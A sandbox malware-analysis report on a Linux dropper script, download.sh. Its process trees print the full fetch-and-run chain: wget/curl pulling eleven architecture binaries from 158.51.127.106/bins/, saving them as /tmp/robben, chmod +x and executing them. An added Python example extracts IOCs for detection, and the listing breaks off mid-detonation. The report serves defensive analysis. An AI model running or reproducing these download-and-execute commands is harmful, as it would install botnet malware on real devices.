Analysis Overview
SHA256
19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Threat Level: Shows suspicious behavior
The file download.sh was found to show suspicious behavior. In every detonation below the script fetches eleven architecture-specific binaries (x86_64, mips, mipsel, arm, arm5, arm6, arm7, spc, sh4, i586, i686) from http://158.51.127.106/bins/ with wget and/or curl, pipes each through cat into /tmp/robben (the redirection is done by the shell, which is why the "Writes file to tmp directory" hit is attributed to /tmp/download.sh), marks it executable and runs it as `./robben Payload`. Trying every architecture in turn and executing whichever one loads is the classic multi-architecture dropper loop. Two caveats when reading the detonations: the chmod argument lists (systemd-private-*, snap-private-tmp, ssh-*, config-err-*) differ per VM and are consistent with the script expanding a wildcard over the contents of /tmp, so those names are sandbox artifacts, not indicators; and the "Checks CPU configuration" and "Reads runtime system information" hits are attributed to /usr/bin/curl reading /proc/cpuinfo, /proc/self/auxv and /proc/sys/crypto/fips_enabled, which is library start-up in the download tool rather than behaviour of the dropped binary. The indicators that hold across all platforms are the host 158.51.127.106 (port 80), the /bins/<arch> URL pattern, and the path /tmp/robben.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-22 21:53
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:32
Platform
debian12-mipsel-20240221-en
Max time kernel
85s
Max time network
90s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
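Working from the Processes and Network sections of this detonation, the following is an added example (it is not part of the sandbox's tooling or of the sample) that turns the rendered process tree into IOCs and applies two checks a practitioner wants before acting on a report like this: a chmod-then-exec-from-/tmp rule that fires on /tmp/robben, and a classifier that separates the 158.51.127.106 fetches from resolver, mDNS and Ubuntu connectivity-check background traffic. The sample lines are constructed from the report (abbreviated to two architectures); the parsing rules, the noise lists and the function names are assumptions of the example.

```python
"""IOC extraction and behaviour checks over a sandbox-style Linux process tree.

Added example for this report, not part of the sandbox's own tooling. The
SAMPLE_TREE and SAMPLE_NETWORK values are constructed from the behavioral2
and behavioral6 sections of the report (abbreviated to two architectures);
the parsing rules, the noise classification and the function names are this
example's own assumptions.
"""
import json
import re
from urllib.parse import urlparse

# Constructed sample: the report renders each process as an image line followed
# by its argv in square brackets.
SAMPLE_TREE = """\
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
"""

# Constructed sample rows (destination, domain) taken from the Network tables.
SAMPLE_NETWORK = [
    ("158.51.127.106:80", ""),
    ("1.1.1.1:53", "debian12-mipsel-20240221-en-14"),
    ("224.0.0.251:5353", ""),
    ("185.125.190.97:80", "connectivity-check.ubuntu.com"),
    ("151.101.65.91:443", ""),
    ("158.51.127.106:80", ""),
]

URL_RE = re.compile(r"https?://\S+")
OS_NOISE_DOMAINS = ("connectivity-check.ubuntu.com",)  # assumption: Ubuntu captive-portal probe


def parse_tree(text):
    """Return a list of (image, argv) tuples from the two-line-per-process listing."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    procs = []
    for image, cmd in zip(lines[0::2], lines[1::2]):
        if cmd.startswith("[") and cmd.endswith("]"):
            procs.append((image, cmd[1:-1].split()))
    return procs


def extract_iocs(procs):
    """Unique download URLs (wget and curl hit the same URL, so de-duplicate),
    the hosts they point at, and the per-architecture file names."""
    urls = list(dict.fromkeys(tok for _, argv in procs for tok in argv if URL_RE.fullmatch(tok)))
    hosts = sorted({urlparse(u).hostname for u in urls})
    arches = [u.rsplit("/", 1)[-1] for u in urls]
    return {"urls": urls, "hosts": hosts, "arches": arches}


def chmod_then_exec(procs, tmp="/tmp/"):
    """Flag executions from /tmp of a file that an earlier 'chmod +x' in the same
    tree made executable: the write, mark, run sequence this script shows for
    /tmp/robben. Returns the (image, command line) pairs that match."""
    marked, hits = set(), []
    for image, argv in procs:
        if argv and argv[0] == "chmod" and any(a.startswith("+") and "x" in a for a in argv[1:]):
            marked.update(a for a in argv[1:] if not a.startswith(("+", "-")))
        elif image.startswith(tmp) and image[len(tmp):] in marked:
            hits.append((image, " ".join(argv)))
    return hits


def classify_dest(dest, domain=""):
    """Separate sandbox and OS background traffic from destinations worth reviewing."""
    port = dest.rpartition(":")[2]
    if port == "53" or dest == "224.0.0.251:5353":      # resolver and mDNS chatter
        return "infra-noise"
    if domain.endswith(OS_NOISE_DOMAINS):                # Ubuntu connectivity probe
        return "os-noise"
    return "review"


def destinations_to_review(rows):
    """Unique destinations left after the noise filter, sorted for a blocklist."""
    return sorted({d for d, dom in rows if classify_dest(d, dom) == "review"})


def report(tree=SAMPLE_TREE, network=SAMPLE_NETWORK):
    procs = parse_tree(tree)
    out = extract_iocs(procs)
    out["dropped_exec"] = chmod_then_exec(procs)
    out["review_destinations"] = destinations_to_review(network)
    return out


if __name__ == "__main__":
    print(json.dumps(report(), indent=2))
```

On the behavioral6 rows the filter leaves 151.101.65.91:443, 195.181.164.19:443 and 185.125.188.61:443 in the review set alongside the dropper host; the report gives no process attribution for those, so they should be checked against the Ubuntu image's own update and snap traffic rather than blocked on the strength of this page alone.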
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:52
Platform
debian9-armhf-20240611-en
Max time kernel
84s
Max time network
85s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
memory/837-1-0xb66e8000-0xb66f9044-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:55
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
69s
Max time network
479s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 151.101.65.91:443 | | tcp |
| GB | 195.181.164.19:443 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.97:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.48:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:56
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
83s
Max time network
478s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-timedated.service-w7bIMg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
